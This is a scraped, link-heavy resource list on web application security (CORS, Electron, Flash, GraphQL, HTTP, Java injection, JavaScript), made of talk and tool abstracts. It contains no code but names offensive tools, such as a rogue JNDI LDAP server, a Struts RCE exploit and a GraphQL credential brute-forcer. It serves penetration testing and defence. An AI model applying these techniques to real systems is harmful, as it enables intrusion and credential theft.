- "In this video, we cover the theory behind Cross-Origin Resource Sharing (CORS) vulnerabilities, how to find these types of vulnerabilities from both a white box and black box perspective, how to exploit them and how to prevent them."
- Cross Origin Resource Sharing - CORS - secure-cookie.io
- Presentations/Talks/Videos
- Exploiting CORS Misconfigurations For Bitcoins And Bounties by James Kettle(AppSecEU 2017)
- Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It's already widely understood that certain CORS configurations are dangerous. In this presentation, I'll skim over the old knowledge then coax out and share with you an array of under-appreciated but dangerous subtleties and implications buried in the CORS specification. I'll illustrate each of these with recent attacks on real websites, showing how I could have used them to steal bitcoins from two different exchanges, partially bypass Google's use of HTTPS, and requisition API keys from numerous others. I'll also show how CORS blunders can provide an invaluable link in crafting exploit chains to pivot across protocols, exploit the unexploitable via server and client-side cache poisoning, and even escalate certain open redirects into vulnerabilities that are actually notable.
- Blogpost
- To CORS! The cause of, and solution to, your SPA problems! - Tim Tomes, Kevin Cody
- Cross-Origin Resource Sharing (CORS) is a complex and commonly misunderstood concept that is often implemented wrong for the right reasons. In this talk we will explain the Same-Origin Policy (SOP) and CORS in an easy to understand way. We will then discuss poor implementations of CORS and the resulting issues. We'll continue by releasing research done on a number of development frameworks exposing poorly designed CORS libraries that default to the most dangerous behavior. We'll then demonstrate why all of this matters by conducting a distributed attack against the most common CORS configuration using audience participation and a new tool. Finally, we'll discuss the safest ways to implement CORS. The custom tools used during the talk will be released along with the presentation.
- Of CORS it's Exploitable! What's Possible with Cross-Origin Resource Sharing? - Rebecca Deck(CircleCityCon2019)
- Cross-origin resource sharing (CORS) is extremely common on modern web apps, but scanning tools are terrible at analyzing CORS policy. If testers really understand CORS policy, a damaging exploit is often not far away. Is it possible to force a user to do something significant? Does using a GUID offer any protection? Does the authentication mechanism really protect against cross-origin attacks? Is it really risky to allow all origins? Do pre-flight requests always help? CORS requests get tricky very quickly and scanning tools do not have a good understanding of the intricacies that surface during actual application testing. A quick and dirty JavaScript exploit will put the issue to rest and eliminate hours of theoretical debate. This presentation covers how CORS works and how to find misconfigurations. Dozens of actual applications are distilled into examples demonstrate CORS protections and JavaScript code to bypass them. A basic knowledge of CORS and JavaScript will be helpful to understand the exploit code, but no special background is necessary to grasp the basics of CORS configuration.
- Exploiting CORS Misconfigurations For Bitcoins And Bounties by James Kettle(AppSecEU 2017)
- Papers
- Request and Conquer: Exposing Cross-Origin Resource Size - Tom Van Goethem, Mathy Vanhoef, Frank Piessens, Wouter Joosen(2016)
- In this paper, we explore various techniques that can be employed to reveal the size of resources. As a result of this in-depth analysis, we discover several design flaws in the storage mechanisms of browsers, which allows an adversary to expose the exact size of any resource in mere seconds. Furthermore, we report on a novel size-exposing technique against Wi-Fi networks. We evaluate the severity of our attacks, and show their worrying consequences in multiple real-world attack scenarios. Furthermore, we propose an improved design for browser storage, and explore other viable solutions that can thwart size-exposing attacks.
- Cross-Origin Read Blocking (CORB) - Google
- This document outlines Cross-Origin Read Blocking (CORB), an algorithm by which dubious cross-origin resource loads may be identified and blocked by web browsers before they reach the web page. CORB reduces the risk of leaking sensitive data by keeping it further from cross-origin web pages. In most browsers, it keeps such data out of untrusted script execution contexts. In browsers with Site Isolation, it can keep such data out of untrusted renderer processes entirely, helping even against side channel attacks.
- Request and Conquer: Exposing Cross-Origin Resource Size - Tom Van Goethem, Mathy Vanhoef, Frank Piessens, Wouter Joosen(2016)
- Tools
- CORStest
- A simple CORS misconfiguration scanner
- CORS Exploitation Framework(CEF)
- A proof-of-concept tool for conducting distributed exploitation of permissive CORS configurations.
- Corsy
- Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations.
- CorsMe
- A cors misconfiguration scanner tool based on golang with speed and precision in mind!
- CORStest
- Miscellaneous
- Arbitrary Reflected Origin
- ejj.io/misconfigured-Cors https://gist.github.com/ejcx/74c7d7727767ca3aafa6
- Cross-Origin-Read-Blocking
- Cross-Origin Read Blocking (CORB) - Google
- This document outlines Cross-Origin Read Blocking (CORB), an algorithm by which dubious cross-origin resource loads may be identified and blocked by web browsers before they reach the web page. CORB reduces the risk of leaking sensitive data by keeping it further from cross-origin web pages. In most browsers, it keeps such data out of untrusted script execution contexts. In browsers with Site Isolation, it can keep such data out of untrusted renderer processes entirely, helping even against side channel attacks.
- Cross-Origin Read Blocking (CORB) - Google
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Talks & Presentations
- Securing the DOM from the Bottom Up - Mike Samuel(BSides Cleveland2019)
- 18 years have passed since Cross-Site Scripting (XSS) became the single most common security problem in web applications. Since then, numerous efforts have been proposed to detect, fix or mitigate it, but these piecemeal efforts have not combined to make it easy to produce XSS-free code. This talk explains how Google's security team has achieved a high-level of safety against XSS and related problems by integrating tools to make it easier for developers to produce secure software than vulnerable, and to bound the portion of a codebase that could contribute to a vulnerability. We will show how this works in practice and end with advice on how to achieve the same results on widely-used, open-source stacks and new browser mechanisms that will make it much easier to achieve high-levels of security with good developer experience.
- Securing the DOM from the Bottom Up - Mike Samuel(BSides Cleveland2019)
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- How the Document Object Model Works in JavaScript – DOM Tutorial for Beginners - Dickson Boateng((2023)
- Beyond XSS: Edge Side Include Injection - Louis Dion-Marcil(2018)
- ESI Injection Part 2: Abusing specific implementations - Philippe Arteau(2019)
- Exploring the World of ESI Injection - Sudhanshu Rajbhar(2022)
- Talks & Presentations
- 101
- Electron.js
- Electron (software framework) - Wikipedia
- Electron(code)
- Pentesting Electron Applications 101 -
- awesome-electronjs-hacking
- "A curated list of awesome resources about Electron.js (in)security"
- Articles/Blogposts/Writeups
- no-sandbox
- No Sandbox - Applications That Run Chromium and Chrome Without The Sandbox. TL;DR exploits in these browser based applications are already sandboxed escaped: https://no-sandbox.io/
- From Markdown to RCE in Atom
- As It Stands - Electron Security - 2016
- As It Stands - Update on Electorn Security - 2016
- Modern Alchemy: Turning XSS into RCE
- Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - CodeBlue16
- Modern Alchemy: Turning XSS into RCE - doyensec
- From Markdown to RCE in Atom - statuscode.ch
- Instrumenting Electron Apps for Security Testing - Paolo Stagno
- Signature Validation Bypass Leading to RCE In Electron-Updater - Lorenzo Stella(2020)
- The App Sandbox - Charlie Hess(Slack2020)
- Discord Desktop app RCE - Masato Kinugawa(2020)
- Electron APIs Misuse: An Attacker’s First Choice - Luca Carettoni, Lorenzo Stella(2021)
- Getting Started with Pentesting Electron Applications - cornerpirate(2021)
- Attack Surface Analysis - Part 1 - Application Update: 'A Novel Way to Bypass Executable Signature Checks with Electron' - Parsia(2021)
- Discord Desktop - Remote Code Execution - s1r1us(2021)
- Visual Studio Code Jupyter Notebook RCE - Luca Carettoni(2022)
- Quasar: Compromising Electron Apps - Michael Taggart(2022)
- 1-click RCE in Electron Applications - sharbarkin
- Multiple ways to break Electron applications -Kevin(Mizu)(2022)
- Diving Into Electron Web API Permissions - Robert Dick(2022)
- Security Review for Electron JS applications
- "The CodeAllTheThings is a list of threat sinks used in the manual security source code review for application security."
- electron-research
- no-sandbox
- Documentation
- Papers
- Talks & Presentations
- MarkDoom: How I Hacked Every Major IDE in 2 Weeks - Matt Austin, LevelUp 2017
- Electron - Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - [CB16]
- Electronegativity - A Study of Electron Security - Carettoni(2017)
- Electron Security Checklist - A guide for developers and auditors - Luca Carettoni(2017)
- App.SetAsDefaultRCEClient - Juho Nurminen(Disobey2020)
- We detail three different approaches for exploiting Windows scheme handlers — two of them application-specific and one applicable to Electron apps more generally — and show how Windows Universal Naming Convention can present a significant risk for command injection. We also demonstrate a small tool for exploiting the Chrome DevTools protocol. While most of the issues discussed in this talk have already been mitigated on several levels, the Electron team has failed to publicly document which versions of the framework are vulnerable. And while Electron's new tightened release cycle means that vulnerable versions have already reached EOL, when developers are unaware that a vulnerability exists, there is little incentive to upgrade. With this talk, we aim to fix that lack of incentive. In addition to the technical details of the seven vulnerabilities, we provide insight into the disclosure process itself, the various types of programs intended to facilitate it, and their shortcomings. In particular we present our experiences with Zero Day Initiative, who acquire high-impact vulnerabilities, and Mattermost, one of the affected vendors running a responsible disclosure program.
- Published Exploits
- Tools
- electron-run-shell-example
- An HTML5 stand alone app using GitHub Electron (Chrome engine + Node.js) -- this is a GUI wrapper example that runs and process output of a bash shell command.
- Electronegativity
- Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.
- electron-run-shell-example
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Internal Affairs: Hacking File System Access from the Web - Matthew Weeks(BHUSA2021)
- Slides
- The File System Access API deployed to browsers this year is the current version of a W3C draft to give websites, with user approval, the ability to read, write, and edit files and folders the user selects on their devices, an outgrowth of an earlier proposal called Native File System. It has been released and deployed in many Chromium-based browsers. Despite a number of security features implemented in the API, this presentation will show several ways in which a hostile website may gain arbitrary code execution and slip malicious code past operating system and security product scans, or even detailed, manual inspection.
- Internal Affairs: Hacking File System Access from the Web - Matthew Weeks(BHUSA2021)
- Articles/Blogposts/Writeups
- [Testing for Cross-Site-Flashing - OWASP](https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008)\)
- Security Domains, Application Domains, and More in ActionScript 3.0
- The old is new, again. CVE-2011-2461 is back!
- As a part of an ongoing investigation on Adobe Flash SOP bypass techniques, we identified a vulnerability affecting old releases of the Adobe Flex SDK compiler. Further investigation traced the issue back to a well known vulnerability (CVE20112461), already patched by Adobe. Old vulnerability, let's move on? Not this time. CVE20112461 is a very interesting bug. As long as the SWF file was compiled with a vulnerable Flex SDK, attackers can still use this vulnerability against the latest web browsers and Flash plugin. Even with the most recent updates, vulnerable Flex applications hosted on your domain can be exploited. In this presentation, we will disclose the details of this vulnerability (Adobe has never released all technicalities) and we will discuss how we conducted a large scale analysis on popular websites, resulting in the identification of numerous Alexa Top 50 sites vulnerable to this bug. Finally, we will also release a custom tool and a Burp plugin capable of detecting vulnerable SWF applications.
- Advanced Flash Vulnerabilities in Youtube Writeups Series
- Decode Adobe Flex AMF protocol
- Finding XSS vulnerabilities in flash files.
- XSS and CSRF via SWF Applets (SWFUpload, Plupload)
- WordPress Flash XSS in flashmediaelement.swf - cure53
- WordPress Flash XSS in flashmediaelement.swf - cure53
- Security Domains, Application Domains, and More in ActionScript 3.0 - senocular
- Testing for Cross site flashing (OTG-CLIENT-008) - OWASP
- XSS and CSRF via SWF Applets (SWFUpload, Plupload) - Neal Poole
- Getting started with AMF Flash Application Penetration Testing ! - nerdint
- RIA
- Analyzing the Crossdomain Policies of Flash Applications - Analyzing the Crossdomain Policies of Flash Applications - Dongseok Jang, Aishwarya Venkataraman, G. Michael Sawka, Hovav Shacham(2011)
- Adobe: “Cross-domain policy file usage recommendationsfor Flash Player” - http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html
- Oracle: “Cross-Domain XML Support” - http://www.oracle.com/technetwork/java/javase/plugin2-142482.html#CROSSDOMAINXML
- MSDN: “Making a Service Available Across Domain Boundaries” - http://msdn.microsoft.com/en-us/library/cc197955(v=vs.95).aspx
- MSDN: “Network Security Access Restrictions in Silverlight” -http://msdn.microsoft.com/en-us/library/cc645032(v=vs.95).aspx
- Stefan Esser: “Poking new holes with Flash Crossdomain PolicyFiles” http://www.hardened-php.net/library/poking_new_holes_with_flash_crossdomain_policy_files.html
- Jeremiah Grossman: “Crossdomain.xml Invites Cross-siteMayhem” http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html
- Google Doctype: “Introduction to Flash security “ - http://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurity https://www.youtube.com/watch?v=RNt_e0WR1sc
- Securing
- HardenFlash
- Patching Flash binary to stop Flash exploits and zero-days
- HardenFlash
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- 101
- Introduction to GraphQL - GraphQL.org
- Queries and Mutations - GraphQL.org
- Introspection - GraphQL.org
- HowToGraphQL.com
- Security Points to Consider Before Implementing GraphQL - Kristopher Sandoval(2017)
- Why and how to disable introspection query for GraphQL APIs - wallarm(2019)
- GraphQL Cheat Sheet - OWASP
- A Facebook GraphQL crash course - PHWD
- Introducing the Apollo GraphQL data stack - ApolloGraphQL
- The GraphQL stack: How everything fits together - Sashko Stubailo
- Articles/Blogposts/Writeups
- GraphQL - Hacktricks
- poc-graphql
- Research on GraphQL from an AppSec point of view.
- GraphQL - Mahmoud M. Awali
- GraphQL Batching Attack - wallarm(2019)
- Practical GraphQL attack vectors - jondow.eu
- A Hacker’s Guide to the Shopify GraphQL API 🚀
- Looting GraphQL Endpoints for Fun and Profit - @theRaz0r(2017)
- GraphQL - Security Overview and Testing Tips - Paolo Stagno(2018)
- GraphQL vs REST API model, common security test cases for GraphQL endpoints - just_a_noob(2019)
- How to exploit GraphQL endpoint: introspection, query, mutations & tools - YesWeHack
- The 5 Most Common GraphQL Security Vulnerabilities - Aidan Noll(2020)
- GraphQL path enumeration for better permission testing - deesee.xyz(2020)
- That single GraphQL issue that you keep missing - Tomasz Swiadek, Andrea Brancaleoni(2021)
- Hacking GraphQL for Fun and Profit (1) - Understanding GraphQL Basics - busk3r(2021)
- Hacking GraphQL for Fun and Profit (2): Methodology & Examples - busk3r(2021)
- Exploiting GraphQL - Shubham Shah(2021)
- Practical GraphQL attack vectors - Sebastian Mihalache(2021)
- A Primer for Testing the Security of GraphQL APIs - Alex Leahu(2021)
- Lessons Learned While Pentesting GraphQL - Sean Verity(2022)
- GraphQL exploitation – All you need to know - Theodoros Danos(2023)
- Securing
- Talks/Presentations/Videos
- An Attackers View of Serverless and GraphQL Apps - Abhay Bhargav(AppSecCali2019)
- This talk presents a red-team perspective of the various ways in which testers can discover and exploit serverless and/or GraphQL driven applications to compromise sensitive information, and gain a deeper foothold into database services, IAM services and other other cloud components. The talk will have some demos that will demonstrate practical attacks and attack possibilities against Serverless and GraphQL applications.
- REST in Peace: Abusing GraphQL to Attack Underlying Infrastructure - Matthew Szymanski(Derbycon2019)
- BugCrowd LevelUp0x5 Version of the talk
- GraphQL is a query language for APIs set to replace RESTful architecture. The use of this technology has achieved rapid adoption and is now leveraged by companies such as GitHub, Credit Karma, and PayPal. Companies such as Hacker One and New Relic have suffered from critical vulnerabilities hidden within GraphQL endpoints. In this talk we will learn enough about GraphQL to be dangerous. Demonstrate how to use the technology?s intricacies against itself while taking advantage of implementation errors and misconfigurations. Examine GraphQL specific attacks as well as tried and true techniques adapted to fit into the GraphQL context. Then walk through how to carry out these attacks efficiently and effectively, introducing a tool to help automate and streamline the process.
- Introduction To GraphQL | Penetration Test - CyberSecurityTV(2020)
- "GraphQL is an API standard such as REST and SOAP. It is a modern query langauge which is being used by a number of applications. In this episode we have discussed different attacks on GraphQL such as Introspection query, Broken Access Control, DoS attack, Injection etc as well prevention. Hope this helps you to become a better testers."
- Finding Your Next Bug: GraphQL - InsiderPHD(2020)
- GraphQL is becoming the next big API technology for developers, but with new technology comes new risk, and for us that means bounties! In this video, I cover everything GraphQL, from how it works to what kind of bugs are common. Next time we're going to expand on this and I'll show you how to do this live!
- Attacking GraphQL's Auto-Correct - Somdev Sangwan(Null Ahmedabad(2021)
- Damn GraphQL - Defending and Attacking APIs - Dolev Farhi(BSides Vancouver(2021)
- With the uprising of GraphQL as a technology, a query language made by Facebook, security professionals must be ready for the day GraphQL hits their company’s networks. In this talk, we will walk through GraphQL basics, followed by a deep dive into the various GraphQL attack vectors, from Information Gathering to Denial of Service and Injections. Additionally, we will discuss a recent security platform release - Damn Vulnerable GraphQL Application (DVGA), a platform made for security practitioners to learn GraphQL and its various weaknesses in a safe testing environment.
- An Attackers View of Serverless and GraphQL Apps - Abhay Bhargav(AppSecCali2019)
- Tools
- graphql-api-monitor
- GraphQL - Demo Vulnerable API
- A simple GraphQL API demonstrating several common vulnerabilities.
- GraphQL Voyager
- Represent any GraphQL API as an interactive graph. It's time to finally see the graph behind GraphQL.
- inql
- A security testing tool to facilitate GraphQL technology security auditing efforts. Can be used as a script or burpsuite extension.
- graphql-path-enum
- Blogpost
- Tool that lists the different ways of reaching a given type in a GraphQL schema.
- Altair GraphQL Client
- graphw00f
- graphw00f (inspired by wafw00f) is the GraphQL fingerprinting tool for GQL endpoints, it sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f will provide insights into what security defences each technology provides out of the box, and whether they are on or off by default. Specially crafted queries cause different GraphQL server implementations to respond uniquely to queries, mutations and subscriptions, this makes it trivial to fingerprint the backend engine and distinguish between the various GraphQL implementations.
- BatchQL
- GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations
- GraphQL IDE
- An extensive IDE for exploring GraphQL API's
- GraphQL Cop
- GraphQL Cop is a small Python utility to run common security tests against GraphQL APIs. GraphQL Cop is perfect for running CI/CD checks in GraphQL. It is lightweight, and covers interesting security issues in GraphQL.
- GraphQL Threat Matrix
- GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations
- inql
- A security testing tool to facilitate GraphQL technology security auditing efforts. InQL can be used as a stand-alone script or as a Burp Suite extension.
- CrackQL
- "CrackQL is a versatile GraphQL penetration testing tool that exploits poor rate-limit and cost analysis controls to brute-force credentials and fuzz operations."
- Graphicator
- Graphicator is a GraphQL "scraper" / extractor. The tool iterates over the introspection document returned by the targeted GraphQL endpoint, and then re-structures the schema in an internal form so it can re-create the supported queries. When such queries are created is using them to send requests to the endpoint and saves the returned response to a file.Erroneous responses are not saved. By default the tool caches the correct responses and also caches the errors, thus when re-running the tool it won't go into the same queries again.
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Fetch Standard
- Fetch Living Standard — 2019/7/16 - whatwg
- The Fetch standard defines requests, responses, and the process that binds them: fetching.
- Fetch Living Standard — 2019/7/16 - whatwg
- 101
- RFC 2068: Hypertext Transfer Protocol -- HTTP/1.1
- RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1
- http-decision-diagram
- An activity diagram to describe the resolution of HTTP response status codes, given various headers, implemented via semantical callbacks.
- Basics of HTTP - MDN WebDocs
- An Overview of HTTP - MDN WebDocs
- Robots.txt
- The HTTP crash course nobody asked for - fasterthanlime(2022)
- HTTP Tools
- curl
- command line tool and library for transferring data with URLs (since 1998)
- Everything curl - the book
- HTTPWTF - Tim Perry(2020)
- Hurl
- Hurl is a command line tool that runs HTTP requests defined in a simple plain text format. It can chain requests, capture values and evaluate queries on headers and body response. Hurl is very versatile: it can be used for fetching data, testing HTTP sessions and testing XML / JSON APIs.
- curl
- Caching
- RFC 7234: Hypertext Transfer Protocol (HTTP/1.1): Caching
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document defines HTTP caches and the associated header fields that control cache behavior or indicate cacheable response messages.
- Browser Caching Checker - GiftOfSpeed
- Cache-Control Recommendations - April King(2021)
- Cache Me If You Can: Exposing your application using caching features - Philippe Arteau(2019)
- RFC 7234: Hypertext Transfer Protocol (HTTP/1.1): Caching
- Certificates
- HTTP Headers
- 101
- 'Security' Headers
- User-Agents
- 101
- Tools
- Security Analyser User Agents
- We've got 141 Security Analyser User Agents in our database. This is a listing of them.
- Security Analyser User Agents
- Injection of
- X-Forwarded-For * X-Forwarded-For Header - Chad Duffey(2020) * The perils of the “real” client IP - adam p(2022)
- HTTP Methods
- HTTP Objects
- HTTP Parameters
- HTTP Pipelining
- 101
- Articles/Blogposts/Writeups
- HTTP Signatures
- HTTP Verbs
- Syntax & Routing
- RFC 7230: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document provides an overview of HTTP architecture and its associated terminology, defines the "http" and "https" Uniform Resource Identifier (URI) schemes, defines the HTTP/1.1 message syntax and parsing requirements, and describes related security concerns for implementations.
- RFC 7230: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
- HTTP2
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- HTTP/2 & QUIC - Teaching Good Protocols To Do Bad Things - Catherine (Kate) Pierce, Vyrus(PHV-Defcon2016)
- The meteoric rise of SPDY, HTTP/2, and QUIC has gone largely unremarked upon by most of the security field. QUIC is an application-layer UDP-based protocol that multiplexes connections between endpoints at the application level, rather than the kernel level. HTTP/2 (H2) is a successor to SPDY, and multiplexes different HTTP streams within a single connection. More than 10% of the top 1 Million websites are already using some of these technologies, including much of the 10 highest traffic sites. Whether you multiplex out across connections with QUIC, or multiplex into fewer connections with HTTP/2, the world has changed. We have a strong sensation of Déjà vu with this work and our 2014 Black Hat USA MPTCP research. We find ourselves discussing a similar situation in new protocols with technology stacks evolving faster than ever before, and Network Security is largely unaware of the peril already upon it. This talk briefly introduces QUIC and HTTP/2, covers multiplexing attacks beyond MPTCP, discusses how you can use these techniques over QUIC and within HTTP/2, and discusses how to make sense of and defend against H2/QUIC traffic on your network. We will also demonstrate, and release, some tools with these techniques incorporated.
- HTTP/2 & QUIC - Teaching Good Protocols To Do Bad Things - Catherine (Kate) Pierce, Vyrus(PHV-Defcon2016)
- HTTP3
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- HTTP Parameter Pollution
- 101
- HTTP Parameter Pollution - Imperva
- HTTP Parameter Pollution (HPP) is a Web attack evasion technique that allows an attacker to craft a HTTP request in order to manipulate or retrieve hidden information. This evasion technique is based on splitting an attack vector between multiple instances of a parameter with the same name. Since none of the relevant HTTP RFCs define the semantics of HTTP parameter manipulation, each web application delivery platform may deal with it differently. In particular, some environments process such requests by concatenating the values taken from all instances of a parameter name within the request. This behavior is abused by the attacker in order to bypass pattern-based security mechanisms.
- HTTP Parameter Pollution - Imperva
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Apache Struts & OGNL
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution
- OGNL Injection Decoded - SecOps Group
- OGNL Apache Struts exploit: Weaponizing a sandbox bypass (CVE-2018-11776) - Man Yue Mo(2018)
- Exploiting Struts RCE on 2.5.26 - Chris McCown(2021)
- Bypassing OGNL sandboxes for fun and charities - Alvaro Munoz(2023)
- JDBC
- Presentations
- Make JDBC Attacks Brilliant Again - Xu Yuanzhen & Chen Hongkun(HITBSI2021)
- Slides
- Other Slides
- In this presentation, we will share our latest research into attacking JDBC. We will start with the derivation of JDBC attacks including the JDBC concept and root cause of vulnerability. We will then give a more in-depth analysis of occurred implementations including the 0day we found (Weblogic RCE). Finally we will share some new ways of exploiting JDBC including XXE and RCE issues – we will also disclose some 0day vulnerabilities in DB2, JBoss Wildfly, ModeShape.
- Make JDBC Attacks Brilliant Again - Xu Yuanzhen & Chen Hongkun(HITBSI2021)
- Presentations
- Java Server Faces (JSF)
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- JNDI
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Tools
- dnsAutoRebinding
- Rogue JNDI
- A malicious LDAP server for JNDI injection attacks
- JNDI-Injection-Exploit
- JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)
- Java Server Pages (JSP)
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Hibernate
- Exploiting Hibernate Injections - Johannes Moritz(2020)
- Hibernate is among one of the most commonly found database libraries used in Java web applications, shipping with its own query language. This technical post will teach you how to detect and exploit Hibernates very own vulnerability: The HQL Injection.
- Exploiting Hibernate Injections - Johannes Moritz(2020)
- RMI
- 101
- Articles/Blogposts/Writeups
- Tools
- General
- Training
- 101
- Articles/Blogposts/Writeups
- Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters - Bharath
- A Brief History of JavaScript - Sebastian Peyrott(2017)
- Javascript for bug bounty hunters(part 1) — Ahmed Ezzat (BitTheByte)
- [Hacker101: JavaScript for Hackers - @STOKfredrik, tomnomnom(2020))](https://www.youtube.com/watch?v=FTeE3OrTNoA
- Real World JavaScript Security by Amanvir Sangha(Devoxx2019)
- This talk covers prevalent but not well known security issues in modern full stack JavaScript applications found in real-world assessments. We will also discuss strategies on avoiding security issues and secure design patterns that can be adopted to write robust and secure JavaScript applications. We cover less well-known issues such as insecure object comparisons and prototype pollution along with how they can be used to exploit applications in Node.js. In addition, the talk also covers new upcoming security standards and protections to protect client-side JavaScript code (TrustedTypes).
- JavaScript Code Review Guide for Bug Bounty Hunters - MikeChan(2021)
- Talks/Presentations/Videos
- [An Infosec Timeline: Noteworthy Events From 1970 To 2050 - Mario Heiderich(OWASP AppSec AMS)(https://www.youtube.com/watch?v=u3x_0955_TU&feature=youtu.be)
- Free Tools! How to Use Developer Tools and Javascript in Webapp Pentests - BHIS(2020)
- I like webapps, don't you? Webapps have got to be the best way to learn about security. Why? Because they're self-contained and so very transparent. You don't need a big ol' lab before you can play with them. You can run them in a single tiny VM or even tiny-er Docker image on your laptop. And so long as you're attacking your own stuff, it's easy to stay out of trouble. You're up and running in the time it takes for a single download. And the transparent part? Ever since "view source" in the earliest web browsers, it's been easy to see exactly what's going on in a webapp and in the browser. Every webapp you ever use has no choice but to give you the (client-side) source code! It's almost like there's no such thing as a "black box" webapp pentest, if you think about it... Anyhow - the Developer Tools in Firefox (and Chrome) are what happens when you take "view source" and add 25 years or so of creativity and power. We'll look at the Developer Tools in the latest Firefox with a pentester's eye. Inspect and change the DOM (Document Object Model), take screenshots, find and extract key bits of data, use the console to run Javascript in the site's origin context and even pause script execution in the debugger if things go too fast... Maybe we'll convince you that you can realistically do a big chunk of a webapp pentest without ever leaving the browser.
- Offensive Javascript Techniques for Red Teamers - Dylan Ayrey, Christian Frichot(BSidesSF2021)
- AppSec is often very heavily focused on pre-exploitation. Frameworks like BeEF break this norm a little and can be used as tools to move laterally from the browser, to implant malware on adjacent machines. Unfortunately, performing network reconnaissance with JavaScript becomes tricky if the victim doesn't keep the tab open for long. This presentation will discuss relatively new techniques and features of JavaScript that have made it easier for sophisticated threat actors to craft JavaScript payloads that target internal network vulnerabilities, as fast as a person can think to close a tab. We'll also show new reconnaissance techniques traditionally used by red teams, post-malware implant, that can be used to get a foothold onto a network from a browser, pre-malware implant. We'll also show some real examples of this, crafting external payloads that target internal assets at large companies, and we'll show how responsible disclosure for intranet facing bugs typically gets resolved.
- JavaScript Obfuscation: It's All About the P-a-c-k-e-r-s — Or Katz(InfosecInTheCity2022)
- In this presentation I will present a lazy, performance cost-effective approach, focusing on the detection of JavaScript packer templates. Once combined with threat intelligence heuristics, this approach can predict the maliciousness level of JavaScript with a high probability of accuracy.
- Debugging
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Cold War with Javascript - Sameer Bhatt(2020)
- "Now every financial sector applications i.e. mobile or web, use one more security layer which is encryption mechanism so the attacker who able to intercept the traffic through any MITM tools can not able to understand the request data. When we do pen-testing we follow some methodology, we have to test each and every parameter and request. well as we all know attackers don't follow any rules or regulations, when they want to attack they will find the way to do it. So as keeping the mindset of the attacker, we will understand this kind of encryption mechanism, what developer thinks when they implement this? also what kind of mistakes they do? why they feel putting encryption means the application is secure? what makes them think that no one can break there logic? so they hide sensitive information behind the encryption. So keeping all the above maybe some more cases in my mind, I prepared my own ""Debugging methodology"" for this, which I follow when I face this kind of scenario."
- Cold War with Javascript - Sameer Bhatt(2020)
- JS Polyglots
- Source Maps
- Reverse-Engineering
- Advanced JS Deobfuscation Via AST and Partial Evaluation (Google Talk WrapUp) - Stefano Di Paola(2015)
- JavaScript AntiDebugging Tricks - x-c3ll(2020)
- Reverse engineering obfuscated JavaScript - PopUnder Chrome 59 - LiveOverflow
- Reverse engineering PopUnder trick for Chrome 60 - LiveOverflow
- Custom Chromium Build to Reverse Engineer Pop-Under Trick - LiveOverflow
- [Live] Reverse Engineering new PopUnder for Chrome 63 on Windows - LiveOverflow
- Javascript Anti Debugging — Some Next Level Sh
*
t (Part 1 — Abusing SourceMappingURL) - Gal Weizman(2019) - JavaScript tampering – detection and stealth - adtechmadness(2019)
- Tools
- JSFuck
- JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
- JSDetox
- JSDetox is a tool to support the manual analysis of malicious Javascript code.
- Dom Flow - Untangling The DOM For More Easy-Juicy Bugs - BH USA 2015
- Javascript Deobfuscator - kahusecurity
- Revelo - kahusecurity
- pwn.js
- A Javascript library for browser exploitation
- Retire.js
- There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of version with known vulnerabilities.
- JSFuck
- General
- Articles/Blogposts/Writeups
- JavaScript Template Attacks
- At Home Among Strangers: Bo0oM(2019)
- Bypassing IP white sheets of some web applications due to incorrect parsing of HTTP request headers.
- Talks/Presentations/Videos
- Articles/Blogposts/Writeups
- Angular
- Articles/Blogposts/Writeups
- Tools
- ngrev
- Graphical tool for reverse engineering of Angular projects. It allows you to navigate in the structure of your application and observe the relationship between the different modules, providers, and directives. The tool performs static code analysis which means that you don't have to run your application in order to use it.
- ngrev
- Backbone.js
- Django
- Be careful what you request for: Injection using the HTTP verb in Django - Grayson Hardaway(2020)
- The Fall Of Mighty Django, Exploiting Unicode Case Transformations - 0xsha(2020)
- Disclosing information with a side-channel in Django - Dennis Brinkrolf(2022)
